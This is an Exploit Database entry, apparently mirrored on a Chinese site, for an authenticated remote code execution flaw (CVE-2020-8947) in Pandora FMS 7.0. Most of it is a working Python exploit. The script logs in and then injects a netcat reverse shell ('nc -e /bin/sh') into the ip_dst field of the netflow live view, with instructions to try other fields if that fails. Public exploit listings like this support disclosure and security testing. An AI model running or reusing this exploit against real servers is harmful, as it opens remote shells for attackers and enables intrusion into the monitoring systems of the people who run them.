PANDORAFMS 7.0 – Authenticated Remote Code Execution

• Exploit Database
• 16 阅读

• 作者： Engin Demirbilek
  日期： 2020-02-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48064/

• # Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
  # Date: 2020-02-12
  # Exploit Author: Engin Demirbilek
  # Vendor homepage: http://pandorafms.org/
  # Version: 7.0
  # Software link: https://pandorafms.org/features/free-download-monitoring-software/
  # Tested on: CentOS
  # CVE: CVE-2020-8947
  
  #!/bin/python
  '''
  PANDORAFMS 7.0 Authenticated Remote Code Execution x4
  This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS.
  incase default vulnerable variable won't work, change the position of payload toone of the following ip_src, dst_port, src_port
  
  Author: Engin Demirbilek
  Github: github.com/EnginDemirbilek
  CVE: CVE-2020-8947
  
  '''
  import requests
  import sys
  
  if len(sys.argv) < 6:
  	print "Usage: ./exploit.py http://url username password listenerIP listenerPort"
  	exit()
  
  url = sys.argv[1]
  user = sys.argv[2]
  password = sys.argv[3]
  payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#'
  
  login = {
  	'nick':user,
  	'pass':password,
  	'login_button':'Login'
  }
  req = requests.Session()
  print "Sendin login request ..."
  login = req.post(url+"/pandora_console/index.php?login=1", data=login)
  
  payload = {
  	'date':"",
  	'time':"",
  	'period':"",
  	'interval_length':"",
  	'chart_type':"",
  	'max_aggregates':"1",
  'address_resolution':"0",
  'name':"",
  'assign_group':"0",
  'filter_type':"0",
  'filter_id':"0",
  'filter_selected':"0",
  'ip_dst':payload,
  	'ip_src':"",
  	'dst_port':"",
  	'src_port':"",
  	'advanced_filter':"",
  	'aggregate':"dstip",
  	'router_ip':"",
  	'output':"bytes",
  	'draw_button':"Draw"
  }
  
  print "[+] Sendin exploit ..."
  
  exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={
  'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
  'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
  'Accept-Encoding':'gzip, deflate',
  'Content-Type':'application/x-www-form-urlencoded'})
  
  if exploit.status_code == 200:
  	print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port."
  else:
  	print "[-] Couldn't send the HTTP request, try again."